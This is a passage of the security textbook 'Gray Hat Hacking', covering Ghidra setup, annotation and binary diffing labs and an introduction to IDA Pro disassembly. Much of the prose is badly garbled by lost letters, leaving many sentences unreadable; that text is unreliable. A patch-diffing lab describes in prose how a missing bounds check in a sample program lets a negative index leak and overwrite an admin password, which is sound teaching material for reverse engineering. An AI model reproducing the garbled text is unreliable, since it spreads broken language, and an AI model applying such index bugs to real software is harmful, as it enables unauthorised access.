 you ~/GHHv6/04 ode, povded you ave pevouy oed e Gay Ha
Hak 6 Edo G epooy.
   Ru e oow ommad  a ema wdow o ompe e wo veo o e
poam (a deau vueabe veo ad a paed veo):
┌──(kali kali)-[~GHHv6/ch04]
└─$ gcc students.c -o students
└─$ gcc students-patched.c -o students-patched

   Now a we ave ou ae poam eady, we a eae a poje o wok w
em ad wak ou Gda’ eaue ad uoay.

Gray Hat Hacking: The Ethical Hacker’s Handbook
              Installation and QuickStart
              Le’ a by a e Java  ume depedey o Gda  a deau Ka yem:
              ┌──(kali kali)-[~]
              └─$ sudo apt-get update && sudo apt-get install -y openjdk-11-jdk

                 Nex, dowoad e Gda eeae v9.2.3 pakae om e oa Gda webe
              (p://da-e.o) ad exa  o you ome deoy:
              └─$ unzip ghidra_9.2.3_PUBLIC_20210325.zip -d ~

                  Oe you’e doe w e a, ee e da_9.2.3_PUBLIC deoy ad u
               u ./ghidraRun, ke o:
              └─$ cd ~/ghidra_9.2.3_PUBLIC && ./ghidraRun

              T oud au Gda o e  me ad pomp you w e ed-ue aeeme.

              Setting the Project Workspace
              Te   you eoue upo u Gda  e poje wdow ad a “Tp
              o e Day” pop-up (w we eommed you ek oaoay). You a oe 
              pop-up o vew e poje wdow.
                 I e poje wdow, you a maae you poje, wokpae, ad oo. By
              deau, Gda  pped w e Code Bowe ad veo-ak oo. We w
              wak you ou e aao o e Debue oo owad e ed o e ape.

              Functionality Overview
              Aou Gda oe a o o eaue ad uoay, we w oy ou o e mo
              ba ad beea eaue o mpy’ ake.

              Project Window
              Te poje wdow  e ma wdow avaabe o you ae Gda oad;  povde
              poje maaeme eaue, e ave poje’ ae e, oo e, ad a ovea
              wokpae deo.
                 Le’ eae ou poje ad a wok w e pevouy omped ae e.
              Lau Gda,  you ave’ aeady, ad e oow ee ep:

                   1. Ceae a ew poje by k Fe | New o by pe ctrl-n. We w e 
                      poje o pvae (a , a o-aed poje) a we a e e poje’ ame
                      ad e ode wee  w be oaed.
                   2. Iude e ude ad ude-paed bay e  e poje by k
                      Fe | Impo o by pe i o ea oe. T w dee e e oma ad
                      auae o e bay e (ELF omped w x86:LE:64:deau:,  
                      ae), a ow ex.

                                                                                                                  PART I
   3. Ck e OK buo. A mpo eu ummay w be ow w e e’
      meadaa ad eade popee.
   4. Doube-k e ude ae e o au e Code Bowe ad a
      e aay.

Analysis
A oo a Gda oad e poam,  ue aayz e poam   a’ aeady
bee doe beoe:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 Te aayze peom may ak, bu e mo oabe oe ae ow ee ad
              debed ex:
                                                             (1) User Disassembles Code

                                                                       (new code)

                                                  (2) Function Analyzer
                                                         (new function)

                                                  (3) Stack Analyzer

                                                                (4) Operand Analyzer

                                                                        (5) Data Reference Analyzer

                    • Function Analyzer A addee ad ame o uo baed o e
                      ymbo eeee o by dee uo pooue ad epoue  e ode
                      daemby.
                    • Stack Analyzer Ie ak vaabe ze ad eeee baed o ak bae
                      ad poe opeao a e be o e uo.
                    • Operand Analyzer A ad eove adde ad ymbo eeee baed
                      o aa opead.
                    • Data Reference Analyzer Reove addee ad eeee o daa vaue
                      ad obvou daa ype baed o e memoy eo oao ad opead
                       e ode.
                Te Aay | Oe-So ubmeu aow you o e may o a e dee
              aay ak o a eeed ode bok.

              Code Browser
              Te Code Bowe povde a uve ue eae o Gda’ oe uoay
              ad avao. Mo o you me pe wok w Gda w be   vew, a
               a meu ad ooba o e mo ommo ak. Te deau ayou  ow 
              Fue 4- ad debed ex.
                       ❶ Main menu A e ma opo ae avaabe om  meu.
                       ❷ Toolbar Hee you w d a oup o o buo you a ue a ou
                       o ommo uoay.
                       ❸ Program Trees T povde ee  o a e memoy eme deed
                       by e bay ad w vay deped o e bay oma ad oade.
    File Edit Analysis Graph Navigation        Search   Select   Tools   Window   Help 1

                                                                                                                          PART I
                                                                                             2

   Program         Listing                                           Decompile

         3

   Symbol Tree                           6                                        7

         4

   Data Type

                   Console - Scripting
         5
                                                        8

Figure 4-1 The Code Browser’s default layout

      ❹ Symbol Tree Hee you a quky avae ou a e ymbo deed
      by e debu omao o eoved by e a aay. Tee ymbo
      ae epaaed by ype: mpo, expo, uo, abe, ae, ad amepae.
      ❺ Data Type Manager Bu-, ee, bay-povded, ad ue-deed
      daa ype w be avaabe ee. You a eay avae o opeao o vaue
      ad eeee by e daa ype.
      ❻ Listing Te poam’ ode daemby ad daa eeee ae ed ee.
      You a eay expoe poam o, eeee, ad adde oe. Spea
      omme ad amed vaue eeaed by e Gda oade ad aayze ae
      dpayed ee a we.
      ❼ Decompile T wdow dpay a C auae epeeao o e uo
      eeed o e L wdow. T deompao eae e poe o aayz
      ae ad ompex aemby ode bok.
      ❽ Console – Scripting Reu ad oupu om p ad pu- ae
      ow ee.
   I you o o Poam Tee ad doube-k e .ex memoy eme, e L
wdow w o o e a o e poam’ exeuabe ode ad povde daemby
ode eed w eam ad omme podued by e pevou aay. I ao
a uve omao o expo ad udead e ode, u a adde-
, uo byeode, ommeed daa opead, abe, odoa ba ow
omao, ad o-eeee.
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 I e Symbo Tee, o o e Fe ex pu ad ype LoadStudents o ea o
               uo. Ck  o vew e uo  e L wdow:

                  Te L wdow a a eed vew o e daembed poam ode:

                       ❶ Te L ooba povde quk ae o opy ad pae uo, oop
                       pevew,  ed edo, d vew o poam ompao, apo,
                       ad o ma dpay. You a k Ed e L Fed buo  e
                       ooba o uomze e deau L ayou.
                       ❷ Comme make keep ak o you wok eae. Tey ae omeme
                       povded by e aay o dee ymbo’ vaue ad opead, bu you
                       a add you ow by pe ; (emoo) o -k e eeed
                       adde ad o o e Comme pop-up meu.
                       ❸ Fow aow ow you e deao o odoa ad uodoa jump.
      ❹ Co-eeee k povde omao o wee  e poam vaue
      ae be ead ad we, ad wee uo ae be aed o eeeed.

                                                                                                                   PART I
      Doube-k ee k w ake e L vew o e eeed adde.
      You a ao d eeee o ay adde o ymbo by pe ctrl-shift-f.
      ❺ Memoy Adde ow e aboue ume eeee o ay ode o vaue
      you ae vew  e L wdow. You a avae o ay abay adde
      w e ope e by pe g.
      ❻ Code Bye  a exadema eoded bay epeeao o e ue
      uo.
      ❼ Daemby ode  wee you d e daembed ad aayzed uo
      w e memo ad opead. You a pa ad ae ee uo
      by pe ctrl-shift-g.
      ❽ Te Eopy Leed ad Ovevew Leed deba ep you quky pevew
      ad avae dee pa o e poam by oo od  ayae e
      bay vaae ad eod eopy ad by povd bok abeed Fuo,
      Uazed, Exea Reeee, Iuo, Daa, ad Udeed. You a vew
      a oo-oded eeee by -k e deba ad k Sow Leed.

Search
Gda povde ea uoay a eabe you o ea o pe bay
pae, ex  poam ode, ymbo, uo ame, omme, ad moe. Ao,
 oe a ma ea o pe uo pae, aa, ad  (eade
o e eod). We w expoe ome o ee uo  e ad-o exee
a e ed o e ape.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Decompiler
              Te Deompe eaue povde a C auae epeeao o e daembed ode,
              a ow ee:

                  Aou omped bay ode ao be bou bak o oue, e deompe
              povde a ood eouo o e o expeed by e poam’ ode. T eaue
               vey ueu o bee a we a eaoed evee eee beaue  edue om-
              pexy ad mpove e eadaby o e poam.

              Program Annotations
              Aoao ep you mpove eadaby, povde aao, ad keep ak o e wok
              doe o a eveed poam. Aoao ao ae e eu deompe oupu.
                Gda povde may ype o aoao. Hee ae ome o e mo mpoa oe:

                    • You a ue pea aoao  omme a oma . Tee ae
                      e eu oupu, pey vaue a  addee, ymbo, URL, ad
                      oe oma.
                    • Vaabe aoao aow you o ae a vaabe’ ymbo ame,  daa ype,
                      ad  oae oao.
                    • Labe eam aow a abe ad eed ame o moe pe oe
                      o bee udead o e ode.
                    • Fuo aoao a be ued o ae a uo’ ame, aue, a
                      oveo, ad eu vaue daa ype.

              Graphs
              Gda povde poweu ap-eea eaue. Someme exeuo ow ad o-
              doa a beome mey, ad wou ap, udead ome ode m eem
              a mpobe ak. Gap o o vee (o bok) ad ede (o oo ow), ad
              ey a ep you udead e ba, oo ow, oop, eeee, ad eve e
              oeao bewee uo ad abe  e poam.
  Tee ae wo ype o ap:

                                                                                                             PART I
   • Flow graphs Dpay e ow (a-ou ad uodoa jump) bewee
     eeed bok o ode.
   • Call graphs Dpay e equee o a bewee uo.
  You a eeae a ap o e eeed ode o uo by o o e Gap
meu ad ee e deed ap. Te Gap meu povde e oow oo:

   1. Toolbar Aow quk ae o e ad ee e dpay o ap ad
      oe opo.
   2. Graph view A bok (vee) ad ow (ede) ae dpayed ee o eay
      avao, oup, ad peo. You a pa by da e moue, ad
      you a zoom  ad ou w e moue o wee o akpad.
   3. Satellite view Hep you quky avae ou e ap by ow a ma
      map o a aped bok.
Gray Hat Hacking: The Ethical Hacker’s Handbook
               You a ao expo ap o may ap ad daa oma, u a CSV, DOT,
              GML, JSON, Vo, ad oe.

              Lab 4-1: Improving Readability with Annotations

              Fo bee, a vey ua ad umbeome pa o evee eee  o av-
               a ea dea o wa vaou paamee ad daa vaue mea. T ak o oex o
              dee ee vaue e, memoy oe, poe eeee, ad uo au-
              me a be oveome w pope ue o daa ype.
                 A you m aeady kow, e ume o ompue aeue  ao o
              daa ype, w ae oy eeva o e owae deveope du poamm me
              ad ae ued by e ompe o oey a memoy aoao, uue membe
              oe, aay dexe, ad oe e du ompe me.
                 I we ompae e oa ode w e deau deompe vew o e LoadStudents
              uo, ow ex, we m o d e deompe eaue a ueu a  a be.
              We w poeed o mpove e students poam eadaby by a daa ype o
              vaue  e ma uo.

                 Te oue ode ow a for oop eme a oue vaabe by  o ea
              eao a’ ued a a dex o e students oba vaabe, w  a aay o
              ou deed ype Student. Po o aoao, e deomped C epeeao o e
              oepod aemby ode w ow e dex oue vaabe muped by 0x20
              (w  e ze o e Student daa). Ao, ve a e deompe   uawae o
              e daa ype o ea vaabe, evey vaue eeee w be ype-aed, u ompa-
               oue ode eadaby eve moe.
   We a eay mpove eadaby by e vaabe w e oe daa ype
aoao ad eam e vaabe. Le’ peed we do’ ave e oue ode o

                                                                                                                  PART I
a we a expeee e mo ommo eao expeed du ea evee eee-
. Foow ee ep:
   1. Go o e LoadStudents uo by ea  o e Symbo Tee vew, ad
      e o o e Deompe wdow o make ome aoao. We w ae
      vaabe ame, daa ype, ad uo aue baed o e opeao ad
      uo ey ae eaed o  e ode.
   2. Baed o e way e vaabe  deeeeed ad be e a oe o 32 (0x20)
      muped by count dex vaabe, we kow   a aay. Some vaue ea e
      oe ae be e, a ow ex:

       • O e 25, a ee vaue  deeeeed a 24 (0x8) bye om e oe
          (count * 32), o ’ ae o aume   a poe o a ee vaue (int *).
          Te ame oud be “d,” a   be e om e oue dex vaabe.
       • O e 26, e strncpy uo  opy a  oepod o e
          ude’ ame ead om e CSV e o e bae oe (count * 32), o ’
          a aae aay o ukow ze. Howeve, we a ue ’ 24 bye beaue
          ’ wee e pevou vaue oe , ad  oud’ ovewe a membe o
           ow uue (char [24]). We’ a  uue membe “ame.”
       • O e 28, e iVar1  be e om e atoi uo aed o e ade
          vaue  e CSV, w eu a ee, ad e   e a oe 0x
          om e bae oe (count * 32). Teeoe, e’ aume   a ee a
          we. T  e ude’ uue “ade” membe.
   3. Now we a dee ou uom Sude uue daa ype o e eeme  e
      ude aay. Go o e Daa Type Maae wdow, -k e “ude”
      poam daa ype, ee e New ubmeu ad k e “uue” em.
       a. Name e uue Student ad e  ze o 32 bye.
       b. Go o e  ow o e abe (oe 0), doube-k e DaaType ed,
           ad ype char[24]. Te doube-k e Name ed ad ype name.
       c. I e eod ow (oe 24), e e DaaType ed o int ad e e Name
           ed o id.
       d. Repea e ame  o e d ow (oe 28) ad e e Name ed
           o grades.
       e. I you Suue Edo wdow ook ke e oe  Fue 4-2, k e
           Save o ad oe e wdow. Te uue  ow eady o be ued.
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 4-2 Structure Editor window showing the structure to be used

                   4. Pae e uo ove ay ae o e students oba vaabe ad pe ctrl-l
                      o ae  daa ype om undefined[1024] o Student[32] (ou u a a
                      ze o 32, ad 024 dvded by 32 equa 32).
                   5. Cae e e o e vaabe ad uo baed o e oex. Fo ae,
                      e local_20 vaabe  be e a e eu o a fopen uo; eeoe, 
                      oud be e a a FILE * daa ype, ad  ame oud be ome ke fh.
                        a. Pe ctrl-l o ae  ype o FILE *.
                        b. See e vaabe ame ad pe l, o -k ad e ee Reame
                           Vaabe o ae e vaabe ame o fh.
                        c. To avod a e a o fopen, -k e uo, k Ed Fuo
                           Saue, ad,  eeded, ae e uo aue o e  oe a
                           aume ad eu daa ype.

                I you ae uue abou e aue o adad uo, ue e poamme’
              maua by u man 3 fopen  a ema wdow.
   Ae ompe  poe, you oud oe a e eadaby o bo e
deomped ad  daembed ode  eay mpoved, a ow ex. Ao, evey

                                                                                                                 PART I
oe uo eee e aoaed vaabe, uo, ad daa ype w bee
om  eo.

Lab 4-2: Binary Diffing and Patch Analysis

We vueabe ae doveed ad epoed, vedo poeed o pa e pod-
u ad pub e updae. Someme e updae’ ae o  med  dea
ead e paed bu, ad  ode o udead e ae ad deveop expo,
bay d beome eeay.
   T ab w wak you ou e poe o dove a vueaby ae e
ude ade maaeme oo by mea o bay d. Te vueaby oud
be eay eou o po by mpy pe e ode, bu, aa, we w peed we oy
ave ae o e bay e o bee muae a ea-wod eao.

Setup
Gda povde a ode deee eaue a eabe you o ompae e deee
bewee wo bae w e ame adde ayou ad poo. T  ueu o bay
paed ompao w a oe-o-oe oe oeao, bu  doe’ oeae ode 
em o oex ad exeuo ow.
   Fouaey, we a exed Gda’ apabe by a pu- u a
BDHepe o e exee BD oo. To do o, oow ee ep:
   1. Ia e Gade bud auomao oo, veo 6.5, by u e oow
      ommad:
┌──(kali kali)-[~]
└─$ wget https://services.gradle.org/distributions/gradle-6.5-milestone-2-bin.zip
&& sudo unzip gradle-6.5-milestone-2-bin.zip -d /opt
Gray Hat Hacking: The Ethical Hacker’s Handbook
                   2. Coe ad ompe e BExpo2 pu- om e oa epooy. T pu-
                       auomae e BExpo deee daabae-eeao poe:
                       ┌──(kali kali)-[~]
                       └─$ git clone --single --depth=1 --branch=master \
                             https://github.com/google/binexport ~/binexport &&
                             cd ~/binexport/java/BinExport &&
                             /opt/gradle-6.5-milestone-2/bin/gradle \
                             -PGHIDRA_INSTALL_DIR=~/ghidra_9.2.3_PUBLIC
                      Te ompe poe oud ake a ew mue. Oe   doe, a BExpo pu-
                       ZIP e oud ave bee eaed de e ~/bexpo/java/BExpo ode.
                   3. O Gda’ poje wdow, o o e Fe | Ia Exeo meu ad k e
                      pu  (+) o o add e pu-’ ZIP e o e ~/bexpo/java/BExpo/
                      d ode, a ow ex:

                   4. Ck OK ad ea Gda o a e pu- ae ae apped.
                   5. I a ema wdow, dowoad ad a BD v6 om e oa e3:
              ┌──(kali kali)-[~]
              └─$ wget https://storage.googleapis.com/bindiff-releases/bindiff_6_amd64.deb
              └─$ sudo dpkg -i bindiff_6_amd64.deb || sudo apt-get install -f
                      Iaao o e .deb pakae w pomp you o e IDA Po pa. Leave 
                      empy o pey we ae eeed  e expemea Gda exeo.
                   6. Coe ad ompe e BDHepe pu- om e oa epooy:
                       └─$ cd ~/ && git clone --single --depth=1 --branch=master \
                                   https://github.com/ubfx/BinDiffHelper &&
                                   cd ~/BinDiffHelper &&
                                   /opt/gradle-6.5-milestone-2/bin/gradle \
                                   -PGHIDRA_INSTALL_DIR=~/ghidra_9.2.3_PUBLIC
                   7. O Gda’ poje wdow, o o e Fe | Ia Exeo meu ad add e
                      pu-’ Zp e o e ~/BDHepe/d/ ode, a ow ex.

                                                                                                                PART I
   8. Rea Gda o a pu- ae ae apped.

Binary Diffing
Now a e pu- ave bee aed, e’ oue e ab by expo e bay
d poe:
   9. Ope e students-patched poam e. You w be pomped a ew
      exeo ave bee deeed:

     See Ye o oue e ew pu-, ad  e ex wdow, k OK:
Gray Hat Hacking: The Ethical Hacker’s Handbook
                 10. Ru Auo-Aayze ad ave e poje.
                 11. Repea ep 9 ad 0, bu  me w e students poam e.
                 12. Ope e Wdow/BDHepe pu- wdow. Ck e oue o o
                     e e oe BD 6 bay pa (/op/bd/b/bd ), a ow ex:

                 13. Ope e students-patched poam by k e “Ope a e o ompao”
                     o. You oud ow ee Smay ad Codee oe o ea uo. Go
                     o e ViewStudentGrades uo a e boom, ee e mpo ekbox,
                     ad k e “Impo Seeed Fuo” o.

              Patch Analysis
              Te oo a eveaed deee bewee e poam o e ViewStudentGrades
              uo, a ow ex:
    A quk peo o e deompao o bo veo’ uo evea ee wa
o bouday ek o e students aay dex we pa e ue’ pu w e

                                                                                                                PART I
atoi uo. Ta mea we a ee ay pove o eave dex umbe, aow
u o ea ay 32-bye-aed adde a a Student daa uue.
    Te “Cae ade” opo aow o a ude’ ade  e oe pa-
wod  e. I u ou a we a ue  vueaby o ou avo. I we o o
Wdow | Symbo Tabe ad ea o e admin_password ymbo, we’ oe 
 oaed a oe 0x001040a0. Ta  exay 64 bye beoe e students aay bae
adde (0x001040e0).
    Wa woud appe  we ue e “Vew ade” opo ad ee ude umbe -2?

   A you a ee, ea admin_password’ memoy a a Student uue ype va-
abe w ed up av e pawod exay o e uue’ “ame” poo. We ave
oud a ead expoao pmve ad a ow ead 24 bye om ay 32-bye-aed
memoy vaue.
   Bu a’ o a. Noe ow we oo e dex vaue ad ade membe vaue o
e students uue  e ChangeStudentGrades uo. Ta mea we a we
4 bye a ay oao 28 bye om ay 32-bye-aed memoy adde.

Summary
I  ape, we oveed ba Gda eaue ad uoay o e you aed,
eav e doo ope o you o expoe moe advaed op. We ooked a op
u a e Gda eae, mpov eadaby w aoao, ad ow o ue
Gda o bay d ad pa aay. Take e me o expoe oe poweu
ad advaed Gda eaue, u a auoma evee eee ak w Gda
p ad e ede pobe  pu- yem aow.
Gray Hat Hacking: The Ethical Hacker’s Handbook
              For Further Reading
              Ghidra’s Embedded Help Pe f1 o k Hep o ay meu em o dao.
              Ghidra’s Wiki da-e.o/CeaSee.m
              Recon MTL 2019 (by ghidracadabra and emteere) ub.om/NaoaSeuyAey/
              da/wk/e/eo209.pd
              Black Hat USA 2019 (by Brian Knighton and Chris Delikat) ub.om/
              NaoaSeuyAey/da/wk/e/baka209.pd

              References
                   1. BDHepe, p://ub.om/ubx/BDHepe.
                   2. BExpo, p://ub.om/ooe/bexpo.
                   3. zyam BD, p://www.zyam.om/bd.m.
  IDA Pro
                                                                             CHAPTER

                                                                                               5
  In this chapter, we cover the following topics:
      • Introduction to IDA Pro for reverse engineering
      • Navigating IDA Pro
      • IDA Pro features and functionality
      • Debugging with IDA Pro

The disassembe and debugge known as Ineaive Disassembe (IDA) Po is a feaue-
ih, eensibe, evese engineeing appiaion owned and mainained by he ompany
He-Rays in Begium. I is a ommeia podu wih aenaive vesions avaiabe suh
as IDA Home and IDA Fee. The IDA famiy of disassembes ae aivey mainained
wih a age numbe of feey avaiabe pug-ins and sips povided by He-Rays and
he use ommuniy. He-Rays aso offes he He-Rays Deompie, aguaby he bes
deompie avaiabe. Compaed o ohe disassembes, i is he mos maue, suppoing
he ages numbe of poesso ahieues and feaues.

Introduction to IDA Pro for Reverse Engineering
Wih he age numbe of fee and aenaive disassembes avaiabe, why hoose IDA
Po? Fee aenaive disassembes inude Ghida (oveed in Chape 4), adae2, and
some ohes. Commeia aenaives inude Binay Ninja and Hoppe. Eah of hese
aenaives is a gea disassembe; howeve, IDA is highy espeed, suppoing he
mos poesso ahieues, and wih he geaes numbe of pug-ins, sips, and ohe
eensions. I is widey used by he seuiy eseah ommuniy and offes ouness fea-
ues o aid in he anaysis of binaies. Aso, fee vesions of IDA Po ae avaiabe, wih
he mos een being IDA 7.0; howeve, hey end o be imied in hei funionaiy.
We wi be using IDA Po and assoiaed pug-ins in Chape 18 o pefom Miosof
pah anaysis o oae ode hanges ha oud be indiaive of a pahed vuneabiiy.
The imey weaponizaion of a pahed vuneabiiy is a powefu ehnique used duing
offensive seuiy engagemens.

Gray Hat Hacking: The Ethical Hacker’s Handbook
              What Is Disassembly?
              Fis, e’s ook a he a of disassembing mahine ode. This is oveed in diffeen
              ways esewhee in he book, bu i is impoan o ensue you undesand he fundamen-
              a pupose of a disassembe in eaion o his hape. Fo his eampe, we ae using
              he ompied vesion of he myAtoi pogam povided o you in you ~/GHHv6/ch05
              fode, having peviousy oned he Gay Ha Haking 6h Ediion Gi eposioy. Use
              he objdump oo insaed ono Kai Linu wih he foowing opions o disassembe
              he fis eigh ines of he main funion of he myAtoi pogam. The -j fag aows you
              o speify he seion; in his ase, we ae hoosing he .text o “ode” segmen. The -d
              fag is he opion fo disassembe. We ae gepping fo he sing “<main>:” and pining
              eigh ines afe wih he -A8 fag.
              ┌──(kali kali)-[~]
              └─$ objdump -M intel -j .text -d ./myAtoi | grep "<main>:" -A8

              00000000000011ca <main>:❶
                ❷    ❸                             ❹   ❺
               11ca: 55                           push rbp
               11cb: 48 89 e5                     mov rbp,rsp
               11ce: 48 83 ec 20                  sub rsp,0x20
               11d2: 64 48 8b 04 25 28 00         mov rax,QWORD PTR fs:0x28
               11d9: 00 00
               11db: 48 89 45 f8                  mov   QWORD PTR [rbp-0x8],rax
               11df: 31 c0                        xor   eax,eax
               11e1: c7 45 f3 31 32 33 34         mov   DWORD PTR [rbp-0xd],0x34333231

                 In he fis ine of oupu a ❶, we an see ha he main funion sas a he ea-
              ive viua addess (RVA) offse of 0x00000000000011ca fom wihin he ovea binay
              image. The fis ine of disassembed oupu in main sas wih he offse of 11ca as
              seen a ❷, foowed by he mahine anguage opode 55, seen a ❸. To he igh of he
              opode a ❹ is he oesponding disassembed insuion o mnemoni push, foowed
              by he opeand rbp a ❺. This insuion woud esu in he addess o vaue soed in
              he rbp egise being pushed ono he sak. The suessive ines of oupu eah povide
              he same infomaion, aking he opodes and dispaying he oesponding disassemby.
              This is an 86-64 bi Eeuabe and Linking Foma (ELF) binay. Had his pogam
              been ompied fo a diffeen poesso, suh as ARM, he opodes and disassembed
              insuions woud be diffeen, as eah poesso ahieue has is own insuion se.
                 The wo pimay mehods of disassemby ae inea sweep and eusive desen (aso
              known as eusive avesa). The objdump oo is an eampe of a inea sweep disas-
              sembe, whih sas a he beginning of he ode segmen, o speified sa addess,
              disassembing eah opode in suession. Some ahieues have a vaiabe-engh
              insuion se, suh as 86-64, and ohe ahieues have se size equiemens, suh
              as MIPS, whee eah insuion is 4-byes wide. IDA is an eampe of a eusive desen
              disassembe, whee mahine ode is disassembed ineay uni an insuion is eahed
              ha is apabe of modifying he ono fow, suh as a ondiiona jump o banh. An
              eampe of a ondiiona jump is he insuion jz, whih sands fo jump if zero. This
              insuion heks he zero flag (zf) in he FLAGS egise o see if i is se. If he fag is
              se, hen he jump is aken. If he fag is no se, hen he pogam oune moves on o
              he ne sequenia addess, whee eeuion oninues.
  To add one, he foowing image shows an abiay eampe inside IDA Po of a
ondiiona jump afe ono is euned fom a memoy aoaion funion:

                                                                                                            PART I
  This gaphia view inside of IDA Po is in eusive desen dispay foma.
call         cs:__imp_GetProcessHeap      ❶
mov          r8, r14 ❷                     ; dwBytes
xor          edx, edx ❸                    ; dwFlags
mov          rcx, rax ❹                    ; hHeap
call         cs:__imp_HeapAlloc ❺
mov          r15, rax ❻
test         rax, rax ❼
jz           loc_14006CE15 ❽

   Fis, he funion GetProcessHeap is aed ❶. As he name suggess, his fun-
ion a euns he base addess o hande of he defau poess heap. The addess
of he heap is euned o he ae via he RAX egise. The agumens fo a a o
HeapAlloc ae now being se up wih he fis agumen being he size, opied fom
r14 o r8, a ❷, using he mov insuion. The dwFlags agumen is se o a 0 via he
xor edx, edx insuion, a ❸, indiaing no new opions fo he aoaion eques. The
addess of he heap is opied fom rax ino rcx a ❹. Now ha he agumens ae se up
fo he HeapAlloc funion, he call insuion is eeued a ❺. The epeed eun
fom he a o HeapAlloc is a poine o he aoaed hunk of memoy. The vaue
soed in rax is hen opied o r15 a ❻. Ne, he test rax, rax insuion is eeued
a ❼. The test insuion pefoms a biwise and opeaion. In his ase, we ae esing
he rax egise agains isef. The pupose of he test insuion in his eampe is o
Gray Hat Hacking: The Ethical Hacker’s Handbook
              hek o see if he eun vaue fom he a o HeapAlloc is a 0, whih woud indiae
              a faiue. If rax hods a 0 and we and he egise agains isef, he zero flag (zf) is se.
              If he HEAP_GENERATE_EXCEPTIONS opion is se via dwFlags duing he a
              o HeapAlloc, eepion odes ae euned insead of a 0.1 The fina insuion in
              his bok is he jump if zero (jz) insuion, a ❽. If he zf is se, meaning ha he
              HeapAlloc a faied, we ake he jump; ohewise, we advane ineay o he ne
              sequenia addess and oninue ode eeuion.

              Navigating IDA Pro
              I is impoan o undesand how o popey wok wih and navigae IDA Po, as hee
              ae many defau abs and windows. Le’s sa wih an eampe of oading a basi binay
              ino IDA Po as an inpu fie. When fis oading he myAtoi pogam ino IDA Po, we
              ae pomped wih he foowing window:

                 IDA Po has pased hough he meadaa of he obje fie and deemined ha i is
              a 64-bi ELF binay. IDA pefoms a age amoun of iniia anaysis, suh as he aing
              of eeuion fow, he passing of Fas Libay Idenifiaion and Reogniion Tehnoogy
              (FLIRT) signaues, sak poine aing, symbo abe anaysis and funion naming,
              inseing ype daa when avaiabe, and he assignmen of oaion names. Afe you ik
              OK, IDA Po pefoms is auo-anaysis. Fo age inpu fies, he anaysis an ake some
              ime o ompee. Cosing a he windows and hiding he Navigao ooba speeds up

                                                                                                            PART I
Figure 5-1 IDA Pro default layout

he anaysis. One i is ompeed, iking Windows fom he menu opions and hoos-
ing Reset Desktop esoes he ayou o he defau seing. One IDA Po has finished
is auo-anaysis of he myAtoi pogam, we ge he esu shown in Figue 5-1.

             NOTE A lot of features and items are referenced in Figure 5-1. Be sure to
             refer back to this image as we work our way through the different sections,
             features, and options.

   The Navigao ooba in Figue 5-2 povides an oveview of he enie inpu fie,
boken up by he vaious seions. Eah oo-oded aea wihin he ooba is ikabe
fo easy aess o ha oaion. In ou eampe wih he myAtoi pogam, a age poion
of he ovea image is idenified as regular functions. This indiaes inena funions
and eeuabe ode ompied ino he binay, as opposed o external symbols, whih ae
dynami dependenies, and library functions, whih woud indiae saiay ompied
ibay ode. The Funions window, shown in Figue 5-3, is a is of names fo a ine-
na funions and dynami dependenies.
   Doube-iking an eny auses ha funion o dispay in he main gaph view win-
dow. The g hokey aso aows you o jump diey o an addess. If a symbo abe is
avaiabe o IDA Po, a funions ae named aodingy. If symbo infomaion is no

Figure 5-2 IDA Pro Navigation toolbar
Gray Hat Hacking: The Ethical Hacker’s Handbook
              Figure 5-3
              IDA Pro Functions
              window

              avaiabe fo a given funion, hey ae given he sub pefi, foowed by he Reaive
              Viua Addess (RVA) offse, suh as sub_1020. The foowing is an eampe of when a
              symbo abe is no avaiabe vesus when i is avaiabe:

                 Beow he Funions window is he Gaph Oveview window. Refe o Figue 5-1 o
              see his window. I is simpy an ineaive window epesening he enie funion u-
              eny being anayzed.
                 The Oupu window a he boom of he defau IDA Po ayou is shown in
              Figue 5-4, aong wih he ineaive Pyhon o IDC ba. The Oupu window is whee
              messages ae dispayed, as we as he esus of eneed ommands via IDA Pyhon o IDC.
              IDA Pyhon and IDC ae disussed in Chape 13. In ou eampe, he as message dis-
              payed is, “The iniia auoanaysis has been finished.”

                                                                                                         PART I
Figure 5-4 IDA Pro Output window

   The main window in he ene of IDA Po’s defau ayou is ied IDA View-A in
ou eampe and is shown in Figue 5-5. This is he gaph view, whih dispays fun-
ions and he boks wihin hose funions in a eusive desen sye. Pessing he
spaeba wihin his window swihes he dispay fom gaph view o e view, as shown
in Figue 5-6. Te view is moe of a inea sweep way of ooking a he disassemby.

Figure 5-5 IDA Pro graph view

Figure 5-6 IDA Pro text view
Gray Hat Hacking: The Ethical Hacker’s Handbook

Figure 5-7 IDA Pro Imports tab

              Pessing he spaeba again ogges beween he wo view opions. In Figue 5-5, he
              main funion is dispayed and hee is ony a singe bok of ode. The ype infomaion
              is dispayed a he op of he funion, foowed by oa vaiabes and he disassemby.
                  Figue 5-7 shows he Impos ab. This window dispays a he dynami dependenies
              he inpu fie has on ibay ode. The op eny ised is he printf funion. The shaed
              obje onaining his funion is equied fo he pogam o un and mus be mmap’d
              ino he poess a unime. No shown is he Epos ab. This window dispays a is of
              odinay aessibe epoed funions and hei assoiaed addesses. Shaed objes and
              Dynami Link Libaies (DLLs) make use of his seion.

              IDA Pro Features and Functionality
              IDA Po has a age numbe of bui-in feaues, oos, and funionaiy; howeve, as
              wih many ompe appiaions, hee is a eaning uve when fis geing saed.
              Many of hese opions ae no avaiabe in he IDA Fee vesion. We wi sa wih he
              mos basi pefeene seing, he oo sheme, and hen go ove some of he moe usefu
              feaues. IDA Po offes diffeen pedefined opions wih he oo sheme. To se hese
              opions, ik he Options menu, foowed by Colors. Shown in Figue 5-8 is he IDA
              Coos dop-down menu and opions. You an see beween defau, daua, and dak.
              The dak opion appies o IDA Po in is eniey. The daua opion appies ony o he
              disassemby window. Figue 5-9 shows an eampe of dak mode.

              Cross-References (Xrefs)
              I is quie ommon o wan o know fom whee in a binay hee ae as o a fun-
              ion of inees. These ae aed cross-references, aso known as xrefs. Pehaps you wan
              o know fom whee and when a a o he HeapAlloc funion is made. One mehod
              is o ik he Impos ab, so he Name oumn aphabeiay, and oae he desied
              funion. When his is oaed, doube-ik he name o be aken o he Impo Daa

Figure 5-8 IDA Pro color schemes

                                                                                                         PART I
Figure 5-9 IDA Pro dark mode

(.idaa) seion fo he desied funion, suh as ha shown in Figue 5-10. Wih he
funion seeed wihin he .idaa seion, pess ctrl-x o bing up he efs window.
Figue 5-11 has he esus in ou HeapAlloc eampe. We an see any of he as
ised o go o ha oaion wihin he inpu fie.

